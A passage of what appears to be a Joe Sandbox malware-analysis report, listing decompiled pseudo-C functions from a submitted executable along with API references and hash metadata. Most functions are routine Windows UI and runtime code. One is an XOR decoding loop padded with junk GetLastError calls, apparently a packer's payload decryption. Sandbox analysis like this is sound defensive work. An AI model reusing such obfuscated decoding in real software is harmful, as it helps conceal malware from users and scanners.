                                            						_v8 =  &(_v8[1]);
                                            						_t91 = _t91 + 1;
                                            						_t73 = _t73 + 1;
                                            						__eflags = _t91 - _t88;
                                            					} while (_t91 < _t88);
                                            					goto L25;
                                            				} else {
                                            					_t92 = 0x43b524;
                                            					while(1) {
                                            						_t69 = E00405667(0x480);
                                            						__eflags = _t69;
                                            						if(_t69 == 0) {
                                            							break;
                                            						}
                                            						 *0x43b620 =  *0x43b620 + 0x20;
                                            						__eflags =  *0x43b620;
                                            						 *_t92 = _t69;
                                            						_t13 = _t69 + 0x480; // 0x480
                                            						_t84 = _t13;
                                            						while(1) {
                                            							__eflags = _t69 - _t84;
                                            							if(_t69 >= _t84) {
                                            								break;
                                            							}
                                            							 *(_t69 + 4) =  *(_t69 + 4) & 0x00000000;
                                            							 *_t69 =  *_t69 | 0xffffffff;
                                            							 *(_t69 + 8) =  *(_t69 + 8) & 0x00000000;
                                            							 *((char*)(_t69 + 5)) = 0xa;
                                            							_t69 = _t69 + 0x24;
                                            							_t84 =  *_t92 + 0x480;
                                            						}
                                            						_t92 =  &(_t92[1]);
                                            						__eflags =  *0x43b620 - _t88; // 0x20
                                            						if(__eflags < 0) {
                                            							continue;
                                            						}
                                            						goto L18;
                                            					}
                                            					_t88 =  *0x43b620; // 0x20
                                            					goto L18;
                                            				}
                                            			}





























                                            APIs
                                            • GetStartupInfoA.KERNEL32(?), ref: 00409699
                                            • GetFileType.KERNEL32(?,?,00000000), ref: 00409744
                                            • GetStdHandle.KERNEL32(-000000F6,?,00000000), ref: 004097A7
                                            • GetFileType.KERNEL32(00000000,?,00000000), ref: 004097B5
                                            • SetHandleCount.KERNEL32 ref: 004097EC
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd
                                            Similarity
                                            • API ID: FileHandleType$CountInfoStartup
                                            • String ID:
                                            • API String ID: 1710529072-0
                                            • Opcode ID: ecd1a007bcd950c4f6a802b73a84018a70199882e3a03b2a3ff8f6cc88cac146
                                            • Instruction ID: 8f3487591cd982a3eb9725f147ad5950e145dc92a1b9c359c43610153c7b6e5a
                                            • Opcode Fuzzy Hash: ecd1a007bcd950c4f6a802b73a84018a70199882e3a03b2a3ff8f6cc88cac146
                                            • Instruction Fuzzy Hash: F8510832514605CBD7208F38C884B7677E0EB05368F28467ED596EB3E2D7389C06C759
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 82%
                                            			E0042722C(void* __ecx, void* __edx, void* __eflags, signed int _a4) {
                                            				intOrPtr _v8;
                                            				char _v12;
                                            				void* _v20;
                                            				void* __ebp;
                                            				intOrPtr* _t51;
                                            				intOrPtr _t54;
                                            				int _t58;
                                            				signed int _t65;
                                            				int _t77;
                                            				void* _t79;
                                            				signed int _t80;
                                            				signed int _t82;
                                            				signed int _t83;
                                            				int _t84;
                                            				void* _t88;
                                            				int _t91;
                                            				signed int _t100;
                                            				signed int _t104;
                                            				void* _t109;
                                            				struct tagRECT* _t110;
                                            
                                            				_t88 = __ecx;
                                            				_t104 = _a4 + _a4 * 4 << 3;
                                            				_t109 = _t104 +  *((intOrPtr*)(__ecx + 0x90));
                                            				_t51 = E004271A8(__ecx, __edx, __eflags,  &_v20);
                                            				_v12 =  *_t51;
                                            				_v8 =  *((intOrPtr*)(_t51 + 4));
                                            				_t91 =  *(_t109 + 0x24);
                                            				_t100 = 0 |  *(_t109 + 0x20) - _t91 < 0x00000000;
                                            				_t54 =  *((intOrPtr*)(__ecx + 0xec));
                                            				if(_t54 == 0) {
                                            					 *(_t109 + 0x18) =  *(_t109 + 0x20);
                                            					 *(_t109 + 0x1c) =  *(_t109 + 0x24);
                                            					L12:
                                            					_v20 = MulDiv( *(_t109 + 0x10),  *(_t109 + 0x18),  *(_t109 + 0x1c));
                                            					_t58 = MulDiv( *(_t109 + 0x14),  *(_t109 + 0x18),  *(_t109 + 0x1c));
                                            					_t110 = _t104 +  *((intOrPtr*)(_t88 + 0x90));
                                            					SetRect(_t110, 8, 8, _v20 + 0xb, _t58 + 0xb);
                                            					if( *((intOrPtr*)(_t88 + 0xec)) != 0) {
                                            						_push(0x42e4b0);
                                            						_t65 = _t110->right - _t110->left + 0x10;
                                            						__eflags = _t65;
                                            						_push( &_v12);
                                            						_push(_t110->bottom - _t110->top + 0x10);
                                            						_push(_t65);
                                            						_push(1);
                                            						return E0041AE9C(_t88, _t65);
                                            					}
                                            					asm("cdq");
                                            					asm("cdq");
                                            					_t77 = OffsetRect(_t110, (_v12 - _t110->right - _t110->left - _t100 >> 1) - 1, (_v8 - _t110->bottom - _t110->top - _t100 >> 1) - 1);
                                            					if(_a4 != 1) {
                                            						return _t77;
                                            					}
                                            					return OffsetRect(_t110,  *(_t88 + 0xfc), 0);
                                            				}
                                            				_t79 = _t54 - 1;
                                            				if(_t79 == 0) {
                                            					__eflags = _t100;
                                            					 *(_t109 + 0x1c) = _t91;
                                            					_t80 =  *(_t109 + 0x20);
                                            					if(_t100 == 0) {
                                            						_t82 = _t80 + _t80 * 2 - _t91;
                                            					} else {
                                            						_t82 = _t80 + _t91;
                                            						__eflags = _t82;
                                            					}
                                            					asm("cdq");
                                            					_t83 = _t82 - _t100;
                                            					__eflags = _t83;
                                            					_t84 = _t83 >> 1;
                                            					L9:
                                            					 *(_t109 + 0x18) = _t84;
                                            					goto L12;
                                            				}
                                            				if(_t79 != 1) {
                                            					goto L12;
                                            				}
                                            				if(_t100 == 0) {
                                            					 *(_t109 + 0x1c) = _t91;
                                            					_t84 = ( *(_t109 + 0x20) << 1) -  *(_t109 + 0x24);
                                            				} else {
                                            					_t84 = 1;
                                            					 *(_t109 + 0x1c) = _t84;
                                            				}
                                            				goto L9;
                                            			}
























                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd
                                            Similarity
                                            • API ID: Rect$Offset
                                            • String ID:
                                            • API String ID: 3858320380-0
                                            • Opcode ID: a8bcfc7a24c1dd58891d067b0bfb63c54d62dd3b19c554575f39b6ca731ca03a
                                            • Instruction ID: 9d4db4d92ebfce67b92012e8cfbb6e150ce2038beb84166a71d0e9c619fd8a43
                                            • Opcode Fuzzy Hash: a8bcfc7a24c1dd58891d067b0bfb63c54d62dd3b19c554575f39b6ca731ca03a
                                            • Instruction Fuzzy Hash: 15418871600A15DFD720CF68D944AAABBF6FB88300F484A2DE886D7655D734F805CBA8
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 89%
                                            			E0041AE9C(void* __ecx, void* __eflags) {
                                            				struct tagPOINT* _t76;
                                            				long* _t78;
                                            				long* _t81;
                                            				struct tagPOINT* _t82;
                                            				signed int _t84;
                                            				signed int _t85;
                                            				signed int _t86;
                                            				int _t87;
                                            				struct tagPOINT* _t97;
                                            				signed int _t108;
                                            				void* _t123;
                                            				void* _t125;
                                            
                                            				E00406520(E0042A85C, _t125);
                                            				_t123 = __ecx;
                                            				_push(0);
                                            				 *(_t125 - 0x10) =  *(__ecx + 0x40);
                                            				 *(__ecx + 0x40) =  *(_t125 + 8);
                                            				 *(__ecx + 0x44) =  *(_t125 + 0xc);
                                            				 *(__ecx + 0x48) =  *(_t125 + 0x10);
                                            				E0041A41D(_t125 - 0x24, __eflags);
                                            				 *(_t125 - 4) =  *(_t125 - 4) & 0x00000000;
                                            				E00419E91(_t125 - 0x24,  *(__ecx + 0x40));
                                            				_t76 = __ecx + 0x4c;
                                            				_t76->x =  *(__ecx + 0x44);
                                            				_t76->y =  *(__ecx + 0x48);
                                            				LPtoDP( *(_t125 - 0x1c), _t76, 1);
                                            				_t78 =  *(_t125 + 0x14);
                                            				_t97 = __ecx + 0x54;
                                            				_t97->x =  *_t78;
                                            				_t97->y = _t78[1];
                                            				LPtoDP( *(_t125 - 0x1c), _t97, 1);
                                            				_t81 =  *(_t125 + 0x18);
                                            				_t82 = __ecx + 0x5c;
                                            				_t82->x =  *_t81;
                                            				_t82->y = _t81[1];
                                            				LPtoDP( *(_t125 - 0x1c), _t82, 1);
                                            				_t84 =  *(__ecx + 0x50);
                                            				if(_t84 < 0) {
                                            					 *(__ecx + 0x50) =  ~_t84;
                                            				}
                                            				_t85 =  *(_t123 + 0x58);
                                            				if(_t85 < 0) {
                                            					 *(_t123 + 0x58) =  ~_t85;
                                            				}
                                            				_t86 =  *(_t123 + 0x60);
                                            				if(_t86 < 0) {
                                            					 *(_t123 + 0x60) =  ~_t86;
                                            				}
                                            				 *(_t125 - 4) =  *(_t125 - 4) | 0xffffffff;
                                            				_t87 = E0041A48F(_t125 - 0x24);
                                            				_t108 = 0xa;
                                            				if(_t97->x == 0) {
                                            					asm("cdq");
                                            					_t87 =  *(_t123 + 0x4c) / _t108;
                                            					_t97->x = _t87;
                                            				}
                                            				if( *(_t123 + 0x58) == 0) {
                                            					asm("cdq");
                                            					_t87 =  *(_t123 + 0x50) / _t108;
                                            					 *(_t123 + 0x58) = _t87;
                                            				}
                                            				if( *(_t123 + 0x5c) == 0) {
                                            					asm("cdq");
                                            					_t87 = _t97->x / _t108;
                                            					 *(_t123 + 0x5c) = _t87;
                                            				}
                                            				if( *(_t123 + 0x60) == 0) {
                                            					asm("cdq");
                                            					_t87 =  *(_t123 + 0x58) / _t108;
                                            					 *(_t123 + 0x60) = _t87;
                                            				}
                                            				if( *(_t123 + 0x1c) != 0) {
                                            					E0041B2F1(_t123);
                                            					_t87 =  *(_t125 - 0x10);
                                            					if(_t87 !=  *((intOrPtr*)(_t123 + 0x40))) {
                                            						_t87 = InvalidateRect( *(_t123 + 0x1c), 0, 1);
                                            					}
                                            				}
                                            				 *[fs:0x0] =  *((intOrPtr*)(_t125 - 0xc));
                                            				return _t87;
                                            			}
















                                            APIs
                                            • __EH_prolog.LIBCMT ref: 0041AEA1
                                              • Part of subcall function 0041A41D: __EH_prolog.LIBCMT ref: 0041A422
                                              • Part of subcall function 0041A41D: GetWindowDC.USER32(?,?,?,0041AED0,00000000,?,?,?,?,?,?,?,?,?,?), ref: 0041A44B
                                              • Part of subcall function 00419E91: SetMapMode.GDI32(?,?), ref: 00419EAA
                                              • Part of subcall function 00419E91: SetMapMode.GDI32(?,?), ref: 00419EB8
                                            • LPtoDP.GDI32(?,?,00000001), ref: 0041AEF9
                                            • LPtoDP.GDI32(?,?,00000001), ref: 0041AF11
                                            • LPtoDP.GDI32(?,?,00000001), ref: 0041AF29
                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 0041AFB7
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd
                                            Similarity
                                            • API ID: H_prologMode$InvalidateRectWindow
                                            • String ID:
                                            • API String ID: 2422810626-0
                                            • Opcode ID: 833de7a5b383fbafa19164f96b33c5ca989ee9024f938b107583b44dd389414c
                                            • Instruction ID: ea718bac83f46552081215f01c1c436204e2ca2be48b4d518ea9ba6a6dc7aab3
                                            • Opcode Fuzzy Hash: 833de7a5b383fbafa19164f96b33c5ca989ee9024f938b107583b44dd389414c
                                            • Instruction Fuzzy Hash: 904104B0601B159FCB20DF6AC880A9AB7F5FF48304F10482EE946D7790D7B5E855CB15
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 86%
                                            			E00401163(intOrPtr _a4, intOrPtr _a8, char* _a12) {
                                            				signed int _v8;
                                            				signed int _v12;
                                            				intOrPtr _v16;
                                            				signed int _v20;
                                            				char _t49;
                                            				intOrPtr _t58;
                                            				intOrPtr _t90;
                                            				intOrPtr _t107;
                                            				void* _t115;
                                            
                                            				_v8 =  *_a12;
                                            				_v12 =  *((intOrPtr*)(_a12 + 1));
                                            				_v16 = 0;
                                            				while(_v16 < _a8) {
                                            					asm("cdq");
                                            					_v8 = ((_v8 & 0x000000ff) + 1) % 0x362;
                                            					asm("cdq");
                                            					_v12 = (0 + (_v12 & 0x000000ff)) % 0x362;
                                            					_t58 =  *0x437cc0; // 0x2321c90
                                            					_t107 =  *0x437cc0; // 0x2321c90
                                            					E0040129C(_v8 & 0x000000ff, _t107 + (_v8 & 0x000000ff), _t58 + (_v12 & 0x000000ff));
                                            					_t115 = _t115 + 8;
                                            					asm("cdq");
                                            					_v20 = 0;
                                            					GetLastError();
                                            					GetLastError();
                                            					GetLastError();
                                            					GetLastError();
                                            					GetLastError();
                                            					GetLastError();
                                            					_t90 =  *0x437cc0; // 0x2321c90
                                            					 *(_a4 + _v16) =  *(_a4 + _v16) ^  *(_t90 + (_v20 & 0x000000ff));
                                            					_v16 = _v16 + 1;
                                            				}
                                            				_t49 = _v8;
                                            				 *_a12 = _t49;
                                            				 *((char*)(_a12 + 1)) = _v12;
                                            				return _t49;
                                            			}













                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd
                                            Similarity
                                            • API ID: ErrorLast
                                            • String ID:
                                            • API String ID: 1452528299-0
                                            • Opcode ID: 2fb4c9c442cb0e0720c7f3357a9b25f75bd02d34cfc46486d38f63fe239aacba
                                            • Instruction ID: 50b4629dd769d307c311c64c04c265a3d6c1846e1b25a8a03c552174e884fb50
                                            • Opcode Fuzzy Hash: 2fb4c9c442cb0e0720c7f3357a9b25f75bd02d34cfc46486d38f63fe239aacba
                                            • Instruction Fuzzy Hash: 3031E535A0928A9FCB05CF58CC917BDBF72BF89300F1880F8D4519B352C535AA51DB54
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 95%
                                            			E00415DE6(void* __ebx, intOrPtr __ecx, void* __eflags) {
                                            				void* _t31;
                                            				signed int _t42;
                                            				struct HWND__* _t62;
                                            				void* _t64;
                                            
                                            				E00406520(E00429E94, _t64);
                                            				 *((intOrPtr*)(_t64 - 0x10)) = __ecx;
                                            				E00412F9D(_t64 - 0x38);
                                            				E0041331F(_t64 - 0x74);
                                            				 *(_t64 - 4) = 0;
                                            				_t62 = GetTopWindow( *(__ecx + 0x1c));
                                            				if(_t62 != 0) {
                                            					do {
                                            						 *(_t64 - 0x58) = _t62;
                                            						 *(_t64 - 0x34) = GetDlgCtrlID(_t62) & 0x0000ffff;
                                            						_push(_t62);
                                            						 *((intOrPtr*)(_t64 - 0x24)) = _t64 - 0x74;
                                            						if(E00413767() == 0 || E00412DF9(_t35, 0, 0xbd11ffff, _t64 - 0x38, 0) == 0) {
                                            							if(E00412DF9( *((intOrPtr*)(_t64 - 0x10)),  *(_t64 - 0x34), 0xffffffff, _t64 - 0x38, 0) == 0) {
                                            								_t46 =  *((intOrPtr*)(_t64 + 0xc));
                                            								if( *((intOrPtr*)(_t64 + 0xc)) != 0) {
                                            									if((SendMessageA( *(_t64 - 0x58), 0x87, 0, 0) & 0x00000020) == 0) {
                                            										L11:
                                            										_t46 = 0;
                                            									} else {
                                            										_t42 = E00416528(_t64 - 0x74) & 0x0000000f;
                                            										if(_t42 == 3 || _t42 == 6 || _t42 == 7 || _t42 == 9) {
                                            											goto L11;
                                            										}
                                            									}
                                            								}
                                            								E00413162(_t64 - 0x38,  *((intOrPtr*)(_t64 + 8)), _t46);
                                            							}
                                            						}
                                            						_t62 = GetWindow(_t62, 2);
                                            					} while (_t62 != 0);
                                            				}
                                            				 *(_t64 - 4) =  *(_t64 - 4) | 0xffffffff;
                                            				 *(_t64 - 0x58) = 0;
                                            				_t31 = E00413DB2(_t64 - 0x74);
                                            				 *[fs:0x0] =  *((intOrPtr*)(_t64 - 0xc));
                                            				return _t31;
                                            			}








                                            APIs
                                            • __EH_prolog.LIBCMT ref: 00415DEB
                                            • GetTopWindow.USER32(?), ref: 00415E12
                                            • GetDlgCtrlID.USER32 ref: 00415E27
                                            • SendMessageA.USER32(?,00000087,00000000,00000000), ref: 00415E80
                                            • GetWindow.USER32(00000000,00000002), ref: 00415EBB
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd
                                            Similarity
                                            • API ID: Window$CtrlH_prologMessageSend
                                            • String ID:
                                            • API String ID: 4125289812-0
                                            • Opcode ID: eddda41c1041d001e68a3ff9ed0eca5f426747ef9a7cc5a696e2efd6d8ecddce
                                            • Instruction ID: a7ff307ea5fd4ed9b42493fc3e47649cc0ac06b73cf1fa4f536db176ac1b2ba5
                                            • Opcode Fuzzy Hash: eddda41c1041d001e68a3ff9ed0eca5f426747ef9a7cc5a696e2efd6d8ecddce
                                            • Instruction Fuzzy Hash: 5331A272D00614EACB21EBA5DC859EFBB74EF95304F60022BF411E2295E7784E81CB58
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 92%
                                            			E004105C2(intOrPtr __ecx) {
                                            				void* __esi;
                                            				struct HWND__* _t40;
                                            				void* _t42;
                                            				void* _t50;
                                            				intOrPtr _t63;
                                            				signed int _t66;
                                            				void* _t83;
                                            
                                            				_t63 = __ecx;
                                            				E00406520(E0042A8D0, _t83);
                                            				_push(__ecx);
                                            				_push(__ecx);
                                            				 *(_t83 - 0x10) =  *(_t83 - 0x10) & 0x00000000;
                                            				 *((intOrPtr*)(_t83 - 0x14)) = __ecx;
                                            				if(( *(__ecx + 0x92) & 0x00000008) == 0) {
                                            					L9:
                                            					E00416B16( *((intOrPtr*)(_t83 + 8)), _t83,  *((intOrPtr*)(_t63 + 0x78)));
                                            				} else {
                                            					_t40 =  *(__ecx + 0x1c);
                                            					if(_t40 == 0) {
                                            						goto L9;
                                            					} else {
                                            						_t66 =  *0x436980; // 0x436994
                                            						 *(_t83 - 0x10) = _t66;
                                            						 *(_t83 - 4) =  *(_t83 - 4) & 0x00000000;
                                            						_t42 = E00413740(_t83, GetParent(_t40));
                                            						if(SendMessageA( *(_t42 + 0x1c), 0x464, 0x104, E00416CC1(_t83 - 0x10, _t83, 0x104)) >= 0) {
                                            							E00416D10(_t83 - 0x10, __eflags, 0xffffffff);
                                            						} else {
                                            							E00416A77(_t83 - 0x10, 0x104);
                                            						}
                                            						if( *((intOrPtr*)( *(_t83 - 0x10) - 8)) == 0) {
                                            							L8:
                                            							 *(_t83 - 4) =  *(_t83 - 4) | 0xffffffff;
                                            							E00416AEC(_t83 - 0x10);
                                            							_t63 =  *((intOrPtr*)(_t83 - 0x14));
                                            							goto L9;
                                            						} else {
                                            							_t50 = E00413740(_t83, GetParent( *( *((intOrPtr*)(_t83 - 0x14)) + 0x1c)));
                                            							if(SendMessageA( *(_t50 + 0x1c), 0x465, 0x104, E00416CC1(_t83 - 0x10, _t83, 0x104)) >= 0) {
                                            								E00416D10(_t83 - 0x10, __eflags, 0xffffffff);
                                            								E00416861( *((intOrPtr*)(_t83 + 8)), _t83 - 0x10);
                                            								 *(_t83 - 4) =  *(_t83 - 4) | 0xffffffff;
                                            								E00416AEC(_t83 - 0x10);
                                            							} else {
                                            								E00416A77(_t83 - 0x10, 0x104);
                                            								goto L8;
                                            							}
                                            						}
                                            					}
                                            				}
                                            				 *[fs:0x0] =  *((intOrPtr*)(_t83 - 0xc));
                                            				return  *((intOrPtr*)(_t83 + 8));
                                            			}











                                            APIs
                                            • __EH_prolog.LIBCMT ref: 004105C7
                                            • GetParent.USER32(?), ref: 00410604
                                            • SendMessageA.USER32(?,00000464,00000104,00000000), ref: 0041062C
                                            • GetParent.USER32(?), ref: 00410655
                                            • SendMessageA.USER32(?,00000465,00000104,00000000), ref: 00410672
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd
                                            Similarity
                                            • API ID: MessageParentSend$H_prolog
                                            • String ID:
                                            • API String ID: 1056721960-0
                                            • Opcode ID: 612438848c30a4d30a5efd75428cd7e7014c67747928bacea5f91ea9e0d91145
                                            • Instruction ID: 07ce01a875e9ee4c694f432b72042445b87f7b3637ebdeb0f8d3e1dd1834bd9a
                                            • Opcode Fuzzy Hash: 612438848c30a4d30a5efd75428cd7e7014c67747928bacea5f91ea9e0d91145
                                            • Instruction Fuzzy Hash: 13318170600216ABCF14EFA1DC45AEFB774FF40358F11452AE421A71D1DB78D995CB58
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 63%
                                            			E004150E7(void* __ecx, int _a4, int _a8, RECT* _a12, RECT* _a16) {
                                            				struct tagRECT _v20;
                                            				int _t21;
                                            				struct HWND__* _t22;
                                            				struct HWND__* _t41;
                                            				void* _t42;
                                            				intOrPtr* _t43;
                                            
                                            				_t42 = __ecx;
                                            				_t21 = IsWindowVisible( *(__ecx + 0x1c));
                                            				if(_t21 != 0 || _a12 != _t21 || _a16 != _t21) {
                                            					_t22 = ScrollWindow( *(_t42 + 0x1c), _a4, _a8, _a12, _a16);
                                            				} else {
                                            					_push(5);
                                            					_push( *(_t42 + 0x1c));
                                            					while(1) {
                                            						_t22 = GetWindow();
                                            						_t41 = _t22;
                                            						if(_t41 == 0) {
                                            							goto L7;
                                            						}
                                            						GetWindowRect(_t41,  &_v20);
                                            						E0041A2F1(_t42,  &_v20);
                                            						SetWindowPos(_t41, 0, _v20.left + _a4, _v20.top + _a8, 0, 0, 0x15);
                                            						_push(2);
                                            						_push(_t41);
                                            					}
                                            				}
                                            				L7:
                                            				_t43 =  *((intOrPtr*)(_t42 + 0x34));
                                            				if(_t43 != 0 && _a12 == 0) {
                                            					return  *((intOrPtr*)( *_t43 + 0x58))(_a4, _a8);
                                            				}
                                            				return _t22;
                                            			}










                                            APIs
                                            • IsWindowVisible.USER32(?), ref: 004150F5
                                            • GetWindow.USER32(?,00000005), ref: 00415114
                                            • GetWindowRect.USER32 ref: 00415121
                                              • Part of subcall function 0041A2F1: ScreenToClient.USER32 ref: 0041A305
                                              • Part of subcall function 0041A2F1: ScreenToClient.USER32 ref: 0041A30E
                                            • SetWindowPos.USER32(00000000,00000000,?,?,00000000,00000000,00000015,?), ref: 0041514C
                                            • ScrollWindow.USER32 ref: 00415166
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd
                                            Similarity
                                            • API ID: Window$ClientScreen$RectScrollVisible
                                            • String ID:
                                            • API String ID: 1714389229-0
                                            • Opcode ID: ef22ae36b66fc6a2d65463419495730ca9f2549ea02bd598369f82df62db7c6c
                                            • Instruction ID: 05942f404d56e3bc249559bb1a558a0c6e37b23f98baaac5964d945a6837c05d
                                            • Opcode Fuzzy Hash: ef22ae36b66fc6a2d65463419495730ca9f2549ea02bd598369f82df62db7c6c
                                            • Instruction Fuzzy Hash: 03216A31A00609FFCF229F54DC48EFF7BB9EB88744B44452AF90596261D774AC51CBA4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 90%
                                            			E00420B23(intOrPtr* __ecx, void* __ebp, signed int _a4) {
                                            				void* _t21;
                                            				signed char _t22;
                                            				signed int _t40;
                                            				intOrPtr* _t44;
                                            				void* _t45;
                                            				struct HWND__* _t47;
                                            
                                            				_t45 = __ebp;
                                            				_t40 = _a4;
                                            				_t44 = __ecx;
                                            				if(_t40 != 0 && ( *(__ecx + 0x24) & 0x00000004) != 0) {
                                            					E004166CE(__ecx, 0);
                                            					return SetFocus(0);
                                            				}
                                            				_t21 = E00413740(_t45, GetParent( *(_t44 + 0x1c)));
                                            				if(_t21 != 0) {
                                            					return _t21;
                                            				} else {
                                            					if(_t40 != 0) {
                                            						_t22 =  *(_t44 + 0x24);
                                            						_push(_t45);
                                            						if((_t22 & 0x00000080) != 0) {
                                            							 *(_t44 + 0x24) = _t22 & 0x0000007f;
                                            							 *((intOrPtr*)( *_t44 + 0x8c))();
                                            							_t47 =  *(_t44 + 0x1c);
                                            							if(GetActiveWindow() == _t47) {
                                            								SendMessageA(_t47, 6, 1, 0);
                                            							}
                                            						}
                                            						if(( *(_t44 + 0x24) & 0x00000020) != 0) {
                                            							SendMessageA( *(_t44 + 0x1c), 0x86, 1, 0);
                                            						}
                                            					} else {
                                            						if( *((intOrPtr*)(_t44 + 0xa0)) == 0) {
                                            							 *(_t44 + 0x24) =  *(_t44 + 0x24) | 0x00000080;
                                            							 *((intOrPtr*)( *_t44 + 0x88))();
                                            						}
                                            					}
                                            					asm("sbb edi, edi");
                                            					return E00420BD9(_t44, ( ~_t40 & 0xfffffff0) + 0x20);
                                            				}
                                            			}










                                            APIs
                                            • SetFocus.USER32(00000000,00000000), ref: 00420B3F
                                            • GetParent.USER32(?), ref: 00420B4D
                                            • GetActiveWindow.USER32 ref: 00420B99
                                            • SendMessageA.USER32(?,00000006,00000001,00000000), ref: 00420BAA
                                            • SendMessageA.USER32(?,00000086,00000001,00000000), ref: 00420BBF
                                              • Part of subcall function 004166CE: EnableWindow.USER32(?,?), ref: 004166DC
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd
                                            Similarity
                                            • API ID: MessageSendWindow$ActiveEnableFocusParent
                                            • String ID:
                                            • API String ID: 3951091596-0
                                            • Opcode ID: 41abd3b57886a5f7d358e044880a08afca2a9066e6390131e2ec1389df34b110
                                            • Instruction ID: b973cea33cd40a65d929727e5f9c9eb7024a6c5d1ea90242926d9fabef0d3f3f
                                            • Opcode Fuzzy Hash: 41abd3b57886a5f7d358e044880a08afca2a9066e6390131e2ec1389df34b110
